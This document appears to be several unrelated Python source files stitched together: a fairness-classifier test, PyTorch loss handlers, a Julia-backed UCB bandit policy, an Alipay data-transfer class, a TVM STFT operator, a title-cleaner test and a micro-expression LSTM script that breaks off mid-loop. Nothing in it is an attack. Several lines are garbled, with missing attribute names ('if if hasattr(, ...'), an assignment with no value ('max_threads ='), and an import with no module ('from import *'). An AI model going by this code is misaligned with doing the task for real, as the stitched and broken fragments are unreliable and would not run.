<reponame>yashwarlord/fairness-comparison import os,sys import numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory import utils as ut import loss_funcs as lf # loss funcs that can be optimized subject to various constraints NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy as a performance measure def test_synthetic_data(): """ Generate the synthetic data """ X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control["s1"], y) # compute the p-rule in the original data """ Classify the data without any constraints """ apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept to X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print "== Unconstrained (original) classifier ==" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, "s1") """ Now classify such that we achieve perfect fairness """ apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print "== Constrained (fair) classifier ==" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, "s1") """ Now plot a tradeoff between the fairness and accuracy """ ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data() if __name__ == '__main__': main()
<filename>S2.Surface_Normal/lib/ # coding: utf8 """ @Author : <NAME> """ import torch import torch.nn as nn from torch.autograd import Variable import numpy as np from easydict import EasyDict as edict from collections import OrderedDict as odict from itertools import product def eval_cls(Preds, GTs): acc = torch.mean((Preds==GTs).float()) return acc.item() class Cross_Entropy_Loss_Handler: def __init__(self): self.cross_entropy_loss = nn.CrossEntropyLoss().cuda() # interface function def compute_loss(self, tgts, Pred, GT): """ tgts: list of target names GT : dict of ground truth for each target BxHxW Pred: dict of prediction for each target BxHxWx4 """ mask = GT['mask'] Loss = edict() for tgt in tgts: gt = GT[tgt][mask].view(-1) # as (BxK,) pr = Pred[tgt][mask].view(gt.size(0),-1) # Pred[tgt][mask] (BxK, 4) Loss[tgt] = self.cross_entropy_loss(pr, gt).double() return Loss class Neg_Dot_Loss_Handler: def __init_(self): pass def compute_loss(self, tgts, Pred, GT): Loss = edict() for tgt in tgts: """ Bug fixed on 22 Aug 2018 can only be applied to 1-dim tensor Don't know why there's no error. """ # Loss[tgt] = torch.mean([tgt],Pred[tgt]) ) # In fact here only does -GT[tgt]*Pred[tgt] Loss[tgt] = torch.mean( -torch.sum(GT[tgt]*Pred[tgt], dim=1)) return Loss class Cos_Proximity_Loss_Handler: def __init__(self): self.cos_sim = nn.CosineSimilarity(dim=1).cuda() def compute_loss(self, tgts, Pred, GT): """ tgts: list of target names. In this case has to be tgts=['norm'] GT : dict of ground truth for each target BxHxWx3 Pred: dict of prediction for each target BxHxWx3 """ mask = GT['mask'] Loss = edict() Errs = edict() for tgt in tgts: cos_sim = self.cos_sim(Pred[tgt][mask], GT[tgt][mask]) Loss[tgt] = torch.mean( 1 - cos_sim ) # use 1-cos(theta) to make loss as positive. Errs[tgt] = torch.acos(cos_sim.clamp(-1,1))*180./np.pi # .clip(-1,1) return Loss, Errs class Smooth_L1_Loss_Handler: def __init__(self): self.smooth_l1_loss = nn.SmoothL1Loss().cuda() def compute_loss(self, tgts, Pred, GT): """ tgts: list of target names e.g. tgts=['a', 'e', 't'] GT : dict of ground truth for each target Pred: dict of prediction for each target """ Loss = edict() for tgt in tgts: Loss[tgt] = self.smooth_l1_loss(Pred[tgt], GT[tgt]) # [warning] pred first, gt second return Loss
<reponame>balbok0/SMPyBandits # -*- coding: utf-8 -*- """ The UCB policy for bounded bandits, with UCB indexes computed with Julia. Reference: [Lai & Robbins, 1985]. .. warning:: Using a Julia function *from* Python will not speed up anything, as there is a lot of overhead in the "bridge" protocol used by pyjulia. The idea of using naively a tiny Julia function to speed up computations is basically useless. A naive benchmark showed that in this approach, :class:`UCBjulia` (used withing Python) is about 125 times slower (!) than :class:`UCB`. .. warning:: This is only experimental, and purely useless. See """ from __future__ import division, print_function # Python 2 compatibility __author__ = "<NAME>" __version__ = "0.9" # WARNING: this is a HUGE hack to fix a mystery bug on importing this policy from sys import path from os.path import dirname path.insert(0, '/'.join(dirname(__file__).split('/')[:-1])) try: from .IndexPolicy import IndexPolicy except ImportError: from IndexPolicy import IndexPolicy class UCBjulia(IndexPolicy): """ The UCB policy for bounded bandits, with UCB indexes computed with Julia. Reference: [Lai & Robbins, 1985]. .. warning:: This is only experimental, and purely useless. See """ def __init__(self, nbArms, lower=0., amplitude=1.): """ Will fail directly if the bridge with julia is unavailable or buggy.""" super(UCBjulia, self).__init__(nbArms, lower=lower, amplitude=amplitude) self.t = 0 # Importing the julia module and creating the bridge try: import julia except ImportError as e: print("Error: unable to load the 'julia' Python module. Install with 'pip install julia', or see") # DEBUG raise e _j = julia.Julia() try: self._index_function = _j.evalfile("Policies/UCBjulia.jl") except RuntimeError: try: self._index_function = _j.evalfile("UCBjulia.jl") except RuntimeError: raise ValueError("Error: Unable to load 'UCBjulia.jl' julia file.") # WARNING try: self._index_function([1], [1], 1, 1) except (RuntimeError, ValueError): raise ValueError("Error: the index function loaded from 'UCBjulia.jl' is bugged or unavailable.") # WARNING def computeIndex(self, arm): r""" Compute the current index, at time t and after :math:`N_k(t)` pulls of arm k: .. math:: I_k(t) = \frac{X_k(t)}{N_k(t)} + \sqrt{\frac{2 \log(t)}{N_k(t)}}. """ # WARNING: the 'arm + 1' part comes from the difference between 0-based indexes # for Python and the 1-based indexes in Julia. The rest works pretty well! return self._index_function(self.rewards, self.pulls, self.t, arm + 1)
<gh_stars>100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi class CollectReceiptOpenApiDTO(object): def __init__(self): self._bsn_no = None self._bsn_ref_no = None self._business_scene = None self._channel = None self._channel_log_no = None self._channel_memo = None self._collect_amt = None self._collect_date = None self._collect_status = None self._collected_amt = None self._creator = None self._freeze_amt = None self._fund_log_id = None self._gl_exchange_rate = None self._gmt_create = None self._gmt_modified = None self._payee_account_name = None self._payee_account_no = None self._payee_inst_id = None self._payee_ip_role_id = None self._payer_account_name = None self._payer_account_no = None self._payer_bank_branch_name = None self._payer_inst_id = None self._payer_ip_role_id = None self._receipt_no = None self._ref_trans_no = None self._ref_trans_no_type = None self._source = None self._status = None self._tnt_inst_id = None self._used_amt = None self._writeoff_relative_id = None @property def bsn_no(self): return self._bsn_no @bsn_no.setter def bsn_no(self, value): self._bsn_no = value @property def bsn_ref_no(self): return self._bsn_ref_no @bsn_ref_no.setter def bsn_ref_no(self, value): self._bsn_ref_no = value @property def business_scene(self): return self._business_scene @business_scene.setter def business_scene(self, value): self._business_scene = value @property def channel(self): return self._channel @channel.setter def channel(self, value): self._channel = value @property def channel_log_no(self): return self._channel_log_no @channel_log_no.setter def channel_log_no(self, value): self._channel_log_no = value @property def channel_memo(self): return self._channel_memo @channel_memo.setter def channel_memo(self, value): self._channel_memo = value @property def collect_amt(self): return self._collect_amt @collect_amt.setter def collect_amt(self, value): if isinstance(value, MultiCurrencyMoneyOpenApi): self._collect_amt = value else: self._collect_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value) @property def collect_date(self): return self._collect_date @collect_date.setter def collect_date(self, value): self._collect_date = value @property def collect_status(self): return self._collect_status @collect_status.setter def collect_status(self, value): self._collect_status = value @property def collected_amt(self): return self._collected_amt @collected_amt.setter def collected_amt(self, value): if isinstance(value, MultiCurrencyMoneyOpenApi): self._collected_amt = value else: self._collected_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value) @property def creator(self): return self._creator @creator.setter def creator(self, value): self._creator = value @property def freeze_amt(self): return self._freeze_amt @freeze_amt.setter def freeze_amt(self, value): if isinstance(value, MultiCurrencyMoneyOpenApi): self._freeze_amt = value else: self._freeze_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value) @property def fund_log_id(self): return self._fund_log_id @fund_log_id.setter def fund_log_id(self, value): self._fund_log_id = value @property def gl_exchange_rate(self): return self._gl_exchange_rate @gl_exchange_rate.setter def gl_exchange_rate(self, value): self._gl_exchange_rate = value @property def gmt_create(self): return self._gmt_create @gmt_create.setter def gmt_create(self, value): self._gmt_create = value @property def gmt_modified(self): return self._gmt_modified @gmt_modified.setter def gmt_modified(self, value): self._gmt_modified = value @property def payee_account_name(self): return self._payee_account_name @payee_account_name.setter def payee_account_name(self, value): self._payee_account_name = value @property def payee_account_no(self): return self._payee_account_no @payee_account_no.setter def payee_account_no(self, value): self._payee_account_no = value @property def payee_inst_id(self): return self._payee_inst_id @payee_inst_id.setter def payee_inst_id(self, value): self._payee_inst_id = value @property def payee_ip_role_id(self): return self._payee_ip_role_id @payee_ip_role_id.setter def payee_ip_role_id(self, value): self._payee_ip_role_id = value @property def payer_account_name(self): return self._payer_account_name @payer_account_name.setter def payer_account_name(self, value): self._payer_account_name = value @property def payer_account_no(self): return self._payer_account_no @payer_account_no.setter def payer_account_no(self, value): self._payer_account_no = value @property def payer_bank_branch_name(self): return self._payer_bank_branch_name @payer_bank_branch_name.setter def payer_bank_branch_name(self, value): self._payer_bank_branch_name = value @property def payer_inst_id(self): return self._payer_inst_id @payer_inst_id.setter def payer_inst_id(self, value): self._payer_inst_id = value @property def payer_ip_role_id(self): return self._payer_ip_role_id @payer_ip_role_id.setter def payer_ip_role_id(self, value): self._payer_ip_role_id = value @property def receipt_no(self): return self._receipt_no @receipt_no.setter def receipt_no(self, value): self._receipt_no = value @property def ref_trans_no(self): return self._ref_trans_no @ref_trans_no.setter def ref_trans_no(self, value): self._ref_trans_no = value @property def ref_trans_no_type(self): return self._ref_trans_no_type @ref_trans_no_type.setter def ref_trans_no_type(self, value): self._ref_trans_no_type = value @property def source(self): return self._source @source.setter def source(self, value): self._source = value @property def status(self): return self._status @status.setter def status(self, value): self._status = value @property def tnt_inst_id(self): return self._tnt_inst_id @tnt_inst_id.setter def tnt_inst_id(self, value): self._tnt_inst_id = value @property def used_amt(self): return self._used_amt @used_amt.setter def used_amt(self, value): if isinstance(value, MultiCurrencyMoneyOpenApi): self._used_amt = value else: self._used_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value) @property def writeoff_relative_id(self): return self._writeoff_relative_id @writeoff_relative_id.setter def writeoff_relative_id(self, value): self._writeoff_relative_id = value def to_alipay_dict(self): params = dict() if self.bsn_no: if hasattr(self.bsn_no, 'to_alipay_dict'): params['bsn_no'] = self.bsn_no.to_alipay_dict() else: params['bsn_no'] = self.bsn_no if self.bsn_ref_no: if hasattr(self.bsn_ref_no, 'to_alipay_dict'): params['bsn_ref_no'] = self.bsn_ref_no.to_alipay_dict() else: params['bsn_ref_no'] = self.bsn_ref_no if self.business_scene: if hasattr(self.business_scene, 'to_alipay_dict'): params['business_scene'] = self.business_scene.to_alipay_dict() else: params['business_scene'] = self.business_scene if if hasattr(, 'to_alipay_dict'): params['channel'] = else: params['channel'] = if self.channel_log_no: if hasattr(self.channel_log_no, 'to_alipay_dict'): params['channel_log_no'] = self.channel_log_no.to_alipay_dict() else: params['channel_log_no'] = self.channel_log_no if self.channel_memo: if hasattr(self.channel_memo, 'to_alipay_dict'): params['channel_memo'] = self.channel_memo.to_alipay_dict() else: params['channel_memo'] = self.channel_memo if self.collect_amt: if hasattr(self.collect_amt, 'to_alipay_dict'): params['collect_amt'] = self.collect_amt.to_alipay_dict() else: params['collect_amt'] = self.collect_amt if self.collect_date: if hasattr(self.collect_date, 'to_alipay_dict'): params['collect_date'] = self.collect_date.to_alipay_dict() else: params['collect_date'] = self.collect_date if self.collect_status: if hasattr(self.collect_status, 'to_alipay_dict'): params['collect_status'] = self.collect_status.to_alipay_dict() else: params['collect_status'] = self.collect_status if self.collected_amt: if hasattr(self.collected_amt, 'to_alipay_dict'): params['collected_amt'] = self.collected_amt.to_alipay_dict() else: params['collected_amt'] = self.collected_amt if self.creator: if hasattr(self.creator, 'to_alipay_dict'): params['creator'] = self.creator.to_alipay_dict() else: params['creator'] = self.creator if self.freeze_amt: if hasattr(self.freeze_amt, 'to_alipay_dict'): params['freeze_amt'] = self.freeze_amt.to_alipay_dict() else: params['freeze_amt'] = self.freeze_amt if self.fund_log_id: if hasattr(self.fund_log_id, 'to_alipay_dict'): params['fund_log_id'] = self.fund_log_id.to_alipay_dict() else: params['fund_log_id'] = self.fund_log_id if self.gl_exchange_rate: if hasattr(self.gl_exchange_rate, 'to_alipay_dict'): params['gl_exchange_rate'] = self.gl_exchange_rate.to_alipay_dict() else: params['gl_exchange_rate'] = self.gl_exchange_rate if self.gmt_create: if hasattr(self.gmt_create, 'to_alipay_dict'): params['gmt_create'] = self.gmt_create.to_alipay_dict() else: params['gmt_create'] = self.gmt_create if self.gmt_modified: if hasattr(self.gmt_modified, 'to_alipay_dict'): params['gmt_modified'] = self.gmt_modified.to_alipay_dict() else: params['gmt_modified'] = self.gmt_modified if self.payee_account_name: if hasattr(self.payee_account_name, 'to_alipay_dict'): params['payee_account_name'] = self.payee_account_name.to_alipay_dict() else: params['payee_account_name'] = self.payee_account_name if self.payee_account_no: if hasattr(self.payee_account_no, 'to_alipay_dict'): params['payee_account_no'] = self.payee_account_no.to_alipay_dict() else: params['payee_account_no'] = self.payee_account_no if self.payee_inst_id: if hasattr(self.payee_inst_id, 'to_alipay_dict'): params['payee_inst_id'] = self.payee_inst_id.to_alipay_dict() else: params['payee_inst_id'] = self.payee_inst_id if self.payee_ip_role_id: if hasattr(self.payee_ip_role_id, 'to_alipay_dict'): params['payee_ip_role_id'] = self.payee_ip_role_id.to_alipay_dict() else: params['payee_ip_role_id'] = self.payee_ip_role_id if self.payer_account_name: if hasattr(self.payer_account_name, 'to_alipay_dict'): params['payer_account_name'] = self.payer_account_name.to_alipay_dict() else: params['payer_account_name'] = self.payer_account_name if self.payer_account_no: if hasattr(self.payer_account_no, 'to_alipay_dict'): params['payer_account_no'] = self.payer_account_no.to_alipay_dict() else: params['payer_account_no'] = self.payer_account_no if self.payer_bank_branch_name: if hasattr(self.payer_bank_branch_name, 'to_alipay_dict'): params['payer_bank_branch_name'] = self.payer_bank_branch_name.to_alipay_dict() else: params['payer_bank_branch_name'] = self.payer_bank_branch_name if self.payer_inst_id: if hasattr(self.payer_inst_id, 'to_alipay_dict'): params['payer_inst_id'] = self.payer_inst_id.to_alipay_dict() else: params['payer_inst_id'] = self.payer_inst_id if self.payer_ip_role_id: if hasattr(self.payer_ip_role_id, 'to_alipay_dict'): params['payer_ip_role_id'] = self.payer_ip_role_id.to_alipay_dict() else: params['payer_ip_role_id'] = self.payer_ip_role_id if self.receipt_no: if hasattr(self.receipt_no, 'to_alipay_dict'): params['receipt_no'] = self.receipt_no.to_alipay_dict() else: params['receipt_no'] = self.receipt_no if self.ref_trans_no: if hasattr(self.ref_trans_no, 'to_alipay_dict'): params['ref_trans_no'] = self.ref_trans_no.to_alipay_dict() else: params['ref_trans_no'] = self.ref_trans_no if self.ref_trans_no_type: if hasattr(self.ref_trans_no_type, 'to_alipay_dict'): params['ref_trans_no_type'] = self.ref_trans_no_type.to_alipay_dict() else: params['ref_trans_no_type'] = self.ref_trans_no_type if self.source: if hasattr(self.source, 'to_alipay_dict'): params['source'] = self.source.to_alipay_dict() else: params['source'] = self.source if self.status: if hasattr(self.status, 'to_alipay_dict'): params['status'] = self.status.to_alipay_dict() else: params['status'] = self.status if self.tnt_inst_id: if hasattr(self.tnt_inst_id, 'to_alipay_dict'): params['tnt_inst_id'] = self.tnt_inst_id.to_alipay_dict() else: params['tnt_inst_id'] = self.tnt_inst_id if self.used_amt: if hasattr(self.used_amt, 'to_alipay_dict'): params['used_amt'] = self.used_amt.to_alipay_dict() else: params['used_amt'] = self.used_amt if self.writeoff_relative_id: if hasattr(self.writeoff_relative_id, 'to_alipay_dict'): params['writeoff_relative_id'] = self.writeoff_relative_id.to_alipay_dict() else: params['writeoff_relative_id'] = self.writeoff_relative_id return params @staticmethod def from_alipay_dict(d): if not d: return None o = CollectReceiptOpenApiDTO() if 'bsn_no' in d: o.bsn_no = d['bsn_no'] if 'bsn_ref_no' in d: o.bsn_ref_no = d['bsn_ref_no'] if 'business_scene' in d: o.business_scene = d['business_scene'] if 'channel' in d: = d['channel'] if 'channel_log_no' in d: o.channel_log_no = d['channel_log_no'] if 'channel_memo' in d: o.channel_memo = d['channel_memo'] if 'collect_amt' in d: o.collect_amt = d['collect_amt'] if 'collect_date' in d: o.collect_date = d['collect_date'] if 'collect_status' in d: o.collect_status = d['collect_status'] if 'collected_amt' in d: o.collected_amt = d['collected_amt'] if 'creator' in d: o.creator = d['creator'] if 'freeze_amt' in d: o.freeze_amt = d['freeze_amt'] if 'fund_log_id' in d: o.fund_log_id = d['fund_log_id'] if 'gl_exchange_rate' in d: o.gl_exchange_rate = d['gl_exchange_rate'] if 'gmt_create' in d: o.gmt_create = d['gmt_create'] if 'gmt_modified' in d: o.gmt_modified = d['gmt_modified'] if 'payee_account_name' in d: o.payee_account_name = d['payee_account_name'] if 'payee_account_no' in d: o.payee_account_no = d['payee_account_no'] if 'payee_inst_id' in d: o.payee_inst_id = d['payee_inst_id'] if 'payee_ip_role_id' in d: o.payee_ip_role_id = d['payee_ip_role_id'] if 'payer_account_name' in d: o.payer_account_name = d['payer_account_name'] if 'payer_account_no' in d: o.payer_account_no = d['payer_account_no'] if 'payer_bank_branch_name' in d: o.payer_bank_branch_name = d['payer_bank_branch_name'] if 'payer_inst_id' in d: o.payer_inst_id = d['payer_inst_id'] if 'payer_ip_role_id' in d: o.payer_ip_role_id = d['payer_ip_role_id'] if 'receipt_no' in d: o.receipt_no = d['receipt_no'] if 'ref_trans_no' in d: o.ref_trans_no = d['ref_trans_no'] if 'ref_trans_no_type' in d: o.ref_trans_no_type = d['ref_trans_no_type'] if 'source' in d: o.source = d['source'] if 'status' in d: o.status = d['status'] if 'tnt_inst_id' in d: o.tnt_inst_id = d['tnt_inst_id'] if 'used_amt' in d: o.used_amt = d['used_amt'] if 'writeoff_relative_id' in d: o.writeoff_relative_id = d['writeoff_relative_id'] return o
<gh_stars>1000+ # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=invalid-name, too-many-arguments, too-many-nested-blocks, unused-argument """STFT operator""" from math import pi import tvm from tvm import te, tir from ..utils import ceil_div def _get_max_threads(batch_row): max_threads = return tir.min(batch_row, max_threads) def stft( data, n_fft, hop_length, win_length, window, normalized, onesided, output_shape, ): """ The STFT computes the Fourier transform of short overlapping windows of the input. This gives frequency components of the signal as they change over time. Parameters ---------- data : relay.Expr Either a 1-D tensor or a 2-D batch tensor. n_fft : int The size of Fourier transform hop_length : int The distance between neighboring sliding window frames win_length : int The size of window frame and STFT filter window : relay.Expr A 1-D tensor window frame normalized : bool Whether to return the normalized STFT results onesided : bool Whether to return onesided result or fill with conjugate symmetry Returns ------- output : relay.Expr Tensor containing the STFT result Examples -------- .. code-block:: python data = [1, 2, 3, 4, 5, 6] window = [4, 3, 2] [n_fft, hop_length, win_length, normalized, onesided] = [3, 3, 3, False, True] relay.stft(data, n_fft, hop_length, win_length, window, normalized, onesided) -> [[[15.0000, 0.0000], [34.0000, 0.0000]], [[ 4.5000, 0.8660], [ 1.0000, -1.7321]]] """ def gen_ir( data_ptr, n_fft, hop_length, win_length, window_ptr, normalized, onesided, output_ptr, ): ib = tir.ir_builder.create() data = ib.buffer_ptr(data_ptr) window = ib.buffer_ptr(window_ptr) output = ib.buffer_ptr(output_ptr) max_threads = _get_max_threads(output_ptr.shape[0] * output_ptr.shape[1]) output_size = output_ptr.shape[0] * output_ptr.shape[1] * output_ptr.shape[2] with ib.new_scope(): nthread_tx = max_threads nthread_bx = ceil_div(output_size, max_threads) tx = te.thread_axis("threadIdx.x") bx = te.thread_axis("blockIdx.x") ib.scope_attr(tx, "thread_extent", nthread_tx) ib.scope_attr(bx, "thread_extent", nthread_bx) tid = bx * max_threads + tx with ib.if_scope(tid < output_size): matrix_size = output_ptr.shape[1] * output_ptr.shape[2] batch = tir.floordiv(tid, matrix_size) row = tir.floordiv(tir.indexmod(tid, matrix_size), output_ptr.shape[2]) col = tir.indexmod(tir.indexmod(tid, matrix_size), output_ptr.shape[2]) output[batch, row, col, 0] = tir.Cast(data_ptr.dtype, 0) output[batch, row, col, 1] = tir.Cast(data_ptr.dtype, 0) with ib.for_range(0, win_length) as wlen: output[batch, row, col, 0] += ( window[wlen] * data[batch, col * hop_length + wlen] * tir.cos(2 * pi * row * wlen / win_length) ) output[batch, row, col, 1] -= ( window[wlen] * data[batch, col * hop_length + wlen] * tir.sin(2 * pi * row * wlen / win_length) ) with ib.if_scope(normalized): output[batch, row, col, 0] /= tir.sqrt(tir.const(n_fft, "float32")) output[batch, row, col, 1] /= tir.sqrt(tir.const(n_fft, "float32")) return ib.get() output_buf = tir.decl_buffer(output_shape, data.dtype, "output_buf") return te.extern( output_shape, [data, window], lambda ins, outs: gen_ir( ins[0], n_fft, hop_length, win_length, ins[1], normalized, onesided, outs[0] ), dtype=[data.dtype], out_buffers=[output_buf], name="stft_cuda", tag="stft_cuda", )
from import * import title_cleaner TRUTH = [ (True, 'Manhattan: 1st Ave. - 34th St. E.'), (True, 'Queens: Hoyt Avenue - 24th Street'), (False, "Queens: Flushing Meadow Park - New York World's Fair of 1939-40 - [Industrial exhibits.]"), (False, 'Fifth Avenue - 90th Street, southeast corner'), (False, 'Recreation and hobbies - Miscellaneous - Children.'), (True, 'Manhattan: 59th Street - 6th Avenue'), (True, 'Queens: Queens Boulevard - Junction Boulevard'), (True, 'Manhattan: 50th Street (West) - 5th Avenue'), (True, 'Manhattan: 5th Avenue - 78th Street'), (True, 'Manhattan: 5th Avenue - 33rd Street'), (True, 'Queens: Queens Boulevard - 62nd Avenue'), (False, 'Manhattan: Battery Park.'), (False, 'Manhattan: Central Park - The Sailboat Pool'), (True, 'Queens: Colonial Avenue - 62nd Drive'), (True, 'Queens: Woodhaven Blvd - Fleet Street'), (True, 'Richmond: New Dorp Lane - Cedar Grove Avenue') ] def test_clean_title(): for correct, title in TRUTH: assert correct == title_cleaner.is_pure_location(title), '%s %s' % (correct, title)
from .environment import * from .brain import * from .exception import *
<filename>archive/ import numpy as np import sys import math import operator import csv import glob,os import xlrd import cv2 import pandas as pd from sklearn.svm import SVC from collections import Counter from sklearn.metrics import confusion_matrix import as sio from keras.models import Sequential from keras.layers import LSTM, Dense, TimeDistributed from keras.utils import np_utils from keras import metrics from keras import backend as K from labelling import collectinglabel from reordering import readinput from evaluationmatrix import fpr workplace='/media/ice/OS/Datasets/CASME2_TIM/' dB="CASME2_TIM" rootpath = '/media/ice/OS/Datasets/CASME2_TIM/CASME2_TIM/' if dB == "CASME2_raw": inputDir='/media/ice/OS/Datasets/CASME2-RAW/' resizedFlag=1; elif dB== "CASME2_large": inputDir='/media/ice/OS/Datasets/CASME 2/' wb=xlrd.open_workbook('/media/ice/OS/Datasets/CASME 2/CASME2_label_Ver_2.xls'); ws=wb.sheet_by_index(0) colm=ws.col_slice(colx=0,start_rowx=1,end_rowx=None) iD=[str(x.value) for x in colm] colm=ws.col_slice(colx=1,start_rowx=1,end_rowx=None) vidName=[str(x.value) for x in colm] colm=ws.col_slice(colx=6,start_rowx=1,end_rowx=None) expression=[str(x.value) for x in colm] table=np.transpose(np.array([np.array(iD),np.array(vidName),np.array(expression)],dtype=str)) subjects=26 samples=246 n_exp=5 resizedFlag=1; r=68; w=56 VidPerSubject = [9,13,7,5,19,5,9,3,13,13,10,12,8,4,3,4,34,3,15,11,2,2,12,7,7,16] IgnoredSamples=['sub09/EP13_02','sub09/EP02_02f','sub10/EP13_01','sub17/EP15_01', 'sub17/EP15_03','sub19/EP19_04','sub24/EP10_03','sub24/EP07_01', 'sub24/EP07_04f','sub24/EP02_07','sub26/EP15_01'] listOfIgnoredSamples=[] for s in range(len(IgnoredSamples)): if s==0: listOfIgnoredSamples=[inputDir+IgnoredSamples[s]] else: listOfIgnoredSamples.append(inputDir+IgnoredSamples[s]) elif dB== "CASME2_TIM": inputDir='/media/ice/OS/Datasets/CASME2_TIM/CASME2_TIM/' #replace with croppoed for testing wb=xlrd.open_workbook('/media/ice/OS/Datasets/CASME2_label_Ver_2.xls'); ws=wb.sheet_by_index(0) colm=ws.col_slice(colx=0,start_rowx=1,end_rowx=None) iD=[str(x.value) for x in colm] colm=ws.col_slice(colx=1,start_rowx=1,end_rowx=None) vidName=[str(x.value) for x in colm] colm=ws.col_slice(colx=6,start_rowx=1,end_rowx=None) expression=[str(x.value) for x in colm] table=np.transpose(np.array([np.array(iD),np.array(vidName),np.array(expression)],dtype=str)) # print(type(table)) r=50; w=50 resizedFlag=1; subjects=26 samples=246 n_exp=5 VidPerSubject = [9,13,7,5,19,5,9,3,13,13,10,12,8,4,3,4,34,3,15,11,2,2,12,7,7,16] IgnoredSamples=['sub09/EP13_02/','sub09/EP02_02f/','sub10/EP13_01/','sub17/EP15_01/', 'sub17/EP15_03/','sub19/EP19_04/','sub24/EP10_03/','sub24/EP07_01/', 'sub24/EP07_04f/','sub24/EP02_07/','sub26/EP15_01/'] listOfIgnoredSamples=[] for s in range(len(IgnoredSamples)): if s==0: listOfIgnoredSamples=[inputDir+IgnoredSamples[s]] else: listOfIgnoredSamples.append(inputDir+IgnoredSamples[s]) elif dB == "SMIC": inputDir="/srv/oyh/DataBase/SMIC/HS_naming_modified/" wb=xlrd.open_workbook('/srv/oyh/DataBase/SMIC_label.xlsx'); ws=wb.sheet_by_index(0) colm=ws.col_slice(colx=1,start_rowx=1,end_rowx=None) vidName=[str(x.value) for x in colm] colm=ws.col_slice(colx=2,start_rowx=1,end_rowx=None) expression=[int(x.value) for x in colm] table=np.transpose(np.array([np.array(vidName),np.array(expression)],dtype=str)) samples=164; #6 samples are excluded subjects=16; n_exp=3; r= 170;w=140; VidPerSubject = [6,6,39,19,2,4,13,4,7,9,10,10,4,7,2,22]; listOfIgnoredSamples=[]; resizedFlag=1; else: print("NOT in the selection.") ######### Reading in the input images ######## SubperdB=[] for sub in sorted([infile for infile in os.listdir(inputDir)]): VidperSub=[] for vid in sorted([inrfile for inrfile in os.listdir(inputDir+sub)]): path=inputDir + sub + '/'+ vid + '/' if path in listOfIgnoredSamples: continue # print(dB) # print(path) imgList=readinput(path,dB) numFrame=len(imgList) if resizedFlag ==1: col=w row=r else: img=cv2.imread(imgList[0]) [row,col,_l]=img.shape ## ##read the label for each input video collectinglabel(table, sub[3:], vid, workplace+'Classification/', dB) for var in range(numFrame): img=cv2.imread(imgList[var]) [_,_,dim]=img.shape if dim ==3: img=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) if resizedFlag ==1: #in resize function, [col,row] img=cv2.resize(img,(col,row)) if var==0: FrameperVid=img.flatten() else: FrameperVid=np.vstack((FrameperVid,img.flatten())) VidperSub.append(FrameperVid) SubperdB.append(VidperSub) ##### Setting up the LSTM model ######## data_dim=r*w # 2500 print(data_dim) timesteps=10 # LSTM1 = LSTM(2500, return_sequences=True, input_shape=(timesteps, data_dim)) model=Sequential() # model.add(TimeDistributed(Dense(data_dim), input_shape=(timesteps, data_dim))) model.add(LSTM(2500, return_sequences=True, input_shape=(timesteps, data_dim))) model.add(LSTM(500,return_sequences=False)) ##model.add(LSTM(500,return_sequences=True)) ##model.add(LSTM(50,return_sequences=False)) model.add(Dense(50,activation='sigmoid')) model.add(Dense(5,activation='sigmoid')) model.compile(loss='categorical_crossentropy',optimizer='Adam',metrics=[metrics.categorical_accuracy]) #### generate the label based on subjects ######### label=np.loadtxt(workplace+'Classification/'+ dB +'_label.txt') labelperSub=[] counter = 0 for sub in range(subjects): numVid=VidPerSubject[sub] labelperSub.append(label[counter:counter+numVid]) counter = counter + numVid ##print(np.shape(labelperSub[1])) ##print(labelperSub[1]) ######## Seperating the input files into LOSO CV ######## tot_mat=np.zeros((n_exp,n_exp)) for sub in range(subjects): Train_X=[] Train_Y=[] Test_X=SubperdB[sub] Test_X=np.array(Test_X) Test_Y=labelperSub[sub] Test_Yy=np_utils.to_categorical(Test_Y,5) print(Test_Y) ## print(np.shape(Test_Y)) if sub==0: for i in range(1,subjects): Train_X.append(SubperdB[i]) Train_Y.append(labelperSub[i]) elif sub==subjects-1: for i in range(subjects-1): Train_X.append(SubperdB[i]) Train_Y.append(labelperSub[i]) else: for i in 